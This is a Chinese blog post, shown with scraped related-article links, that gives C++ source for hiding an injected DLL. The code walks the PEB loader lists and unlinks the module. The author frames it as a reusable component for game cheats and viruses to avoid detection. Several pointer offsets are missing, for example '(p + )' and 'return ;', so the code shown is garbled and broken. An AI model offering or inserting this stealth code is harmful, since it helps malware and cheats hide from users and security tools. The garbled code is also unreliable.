先来推广一下QQ群:61618925。欢迎各位爱好编程的加入。

在外挂或者病毒中,经常需要隐藏掉自己注入的DLL,以免被发现。下面就是一个隐藏DLL的通用模块,用的时候只需要加入到相关模块中即可。

详细代码如下:

#include <iostream>

using namespace std;

void HideModule(char *szModule)

{

    DWORD *PEB = NULL;

    DWORD *Ldr = NULL;

    DWORD *Flink = NULL;

    DWORD *p = NULL;

    DWORD *BaseAddress = NULL;

    DWORD *FullDllName = NULL;

    //定位PEB

    __asm

    {

        //fs位置保存着teb

        //fs:[0x30]位置保存着peb

        mov eax,fs:[0x30]

        mov PEB,eax

    }

    HMODULE hMod = GetModuleHandleA(szModule);

    //得到LDR

    Ldr = *((DWORD **)((unsigned char *)PEB + 0x0c));

    //第二条链表

    Flink = *((DWORD **)((unsigned char *)Ldr + 0x0c));

    p = Flink;

    do

    {

        BaseAddress = *((DWORD **)((unsigned char *)p + 0x18));

        FullDllName = *((DWORD **)((unsigned char *)p + 0x28));

        if ((DWORD*)hMod == BaseAddress)

        {

            **((DWORD **)(p + )) = (DWORD)*((DWORD **)p);

            *(*((DWORD **)p) + ) = (DWORD)*((DWORD **)(p + ));

            break;

        }

        p = *((DWORD **)p);

    } while (Flink != p);

    Flink = *((DWORD **)((unsigned char *)Ldr + 0x14));

    p = Flink;

    do

    {

        BaseAddress = *((DWORD **)((unsigned char *)p + 0x10));

        FullDllName = *((DWORD **)((unsigned char *)p + 0x20));

        if (BaseAddress == (DWORD *)hMod)

        {

            **((DWORD **)(p + )) = (DWORD)*((DWORD **)p);

            *(*((DWORD **)p) + ) = (DWORD)*((DWORD **)(p + ));

            break;

        }

        p = *((DWORD **)p);

    } while (Flink != p);

    Flink = *((DWORD **)((unsigned char *)Ldr + 0x1c));

    p = Flink;

    do

    {

        BaseAddress = *((DWORD **)((unsigned char *)p + 0x8));

        FullDllName = *((DWORD **)((unsigned char *)p + 0x18));

        if (BaseAddress == (DWORD *)hMod)

        {

            **((DWORD **)(p + )) = (DWORD)*((DWORD **)p);

            *(*((DWORD **)p) + ) = (DWORD)*((DWORD **)(p + ));

            break;

        }

        p = *((DWORD **)p);

    } while (Flink != p);

}

int main(int argc, char **argv)

{

    HideModule("kernel32.dll");

    HideModule("ntdll.dll");

    HideModule("MSVCR90.dll");

    HideModule("KERNELBASE.dll");

    getchar();

    return ;

}

用我之前博客中的进程管理器查看本进程的DLL,可以发现找不到相应的DLL。

隐藏DLL的更多相关文章

  1. 如何隐藏DLL中,导出函数的名称?(转)

    如何隐藏DLL中,导出函数的名称?(转)   一.引言 很多时候,我们写了一个Dll,不希望别人通过DLL查看工具,看到我们的导出函数名称.可以通过以下步骤实现: 1. 在def函数中做如下定义: L ...

  2. Win32之隐藏DLL隐藏模块技术

    Win32之隐藏DLL隐藏模块技术 这一讲涉及到windows底层技术.跟汇编内容. 我们才可以实现模块隐藏(也称为DLL隐藏) 一丶API反汇编勾引兴趣 我们都用过Windows的进程跟线程API  ...

  3. 如何隐藏DLL中,导出函数的名称?

    一.引言 很多时候,我们写了一个Dll,不希望别人通过DLL查看工具,看到我们的导出函数名称.可以通过以下步骤实现: 1. 在def函数中做如下定义: LIBRARY EXPORTS HideFunc ...

  4. 钩子注入呼出与隐藏DLL窗口

    / MFC_DLL.cpp : 定义 DLL 的初始化例程. // #include "stdafx.h" #include "MFC_DLL.h" #incl ...

  5. 【旧文章搬运】再谈隐藏进程中的DLL模块

    原文发表于百度空间,2009-09-17========================================================================== 相当老的话 ...

  6. 隐藏进程中的模块绕过IceSword的检测

    标 题: [原创] 隐藏进程中的模块绕过IceSword的检测 作 者: xPLK 时 间: 2008-06-19,17:59:11 链 接: http://bbs.pediy.com/showthr ...

  7. dll导出函数的两种方式的比较

    最初的网页链接已经挂了, 在此贴一个中间的转载链接 https://blog.csdn.net/zhazhiqiang/article/details/51577523 一 概要 vs中导出 dll的 ...

  8. 反编译工具 使用.NET JustDecompile来反编译你的程序代码

    原文地址:http://www.it165.net/pro/html/201310/7383.html 前言 在项目的进行中有时会碰到需要去了解由第三方所开发的程序代码或者因为年久已经遗失原始码的程序 ...

  9. 使用.NET JustDecompile来反编译你的程序代码

    前言 在项目的进行中有时会碰到需要去了解由第三方所开发的程序代码或者因为年久已经遗失原始码的程序,由于因为是别人写的所以我们并没有原始码可以直接阅读,碰到这种情况我们就需要去反编译这些程序及 DLL ...

随机推荐

  1. You need tcl 8.5 or newer in order to run the Redis test

    安装Redis时候make test出现的 , 不用下什么tcl8.5再tar了 , 直接yum install tcl就好.

  2. SpringMVC静态资源处理[转]

    SpringMvc配置DispatchServlet对所有请求进行过滤: <servlet> <servlet-name>mvc-dispatcher</servlet- ...

  3. Redis各种数据结构内存占用测试

    启动时:(redis为空) 插入数据量都为100W(100W个key或者list中100W个值,或者1000个key,每个key中1000个值) String Key value # Memory u ...

  4. MySQL运算符之 <=>

    问题 : 我在看以前的一个开发者的代码时看到 WHERE p.name <=> NULL 在这个查询语句中 <=>符号是什么意思啊?是不是和 =号是一样啊?还是一个语法错误啊? ...

  5. js实现加减乘除

    /** ** 除法函数,用来得到精确的除法结果 ** 说明:javascript的除法结果会有误差,在两个浮点数相除的时候会比较明显.这个函数返回较为精确的除法结果. ** 调用:accDiv(arg ...

  6. Mac OS X安装Redis

    http://my.oschina.net/jackieyeah/blog/524583

  7. ACM—最大连续子序列(HDOJ1003)

    HDOJ链接 http://acm.hdu.edu.cn/showproblem.php?pid=1003 不了解题目的朋友可以先看一下题目,在这里就不再详细介绍了.(文章内容和解题思路不完全相同,方 ...

  8. App can入门

    主干 主干可以认为是整个页面的整体框架布局 上图是截取与ZAKER(原生开发).正益无线(HTML5开发).ZAKER微博界面(原生开发)和HTML5中国(HTML5开发).参考上述界面我们看到大部分 ...

  9. gitlab和Django实现push自动更新

    1.设置webhook gitlab->setting->webhook:http://121.143.191.166:7000?token=23028-b396-12e5-9912-ba ...

  10. (转)一段如何調用Button.Click事件的故事

    原文地址:http://helloouc.blog.163.com/blog/static/5530527120091050314590/ 一.前言 由于小朱与BillChung的启发,想写一个故事, ...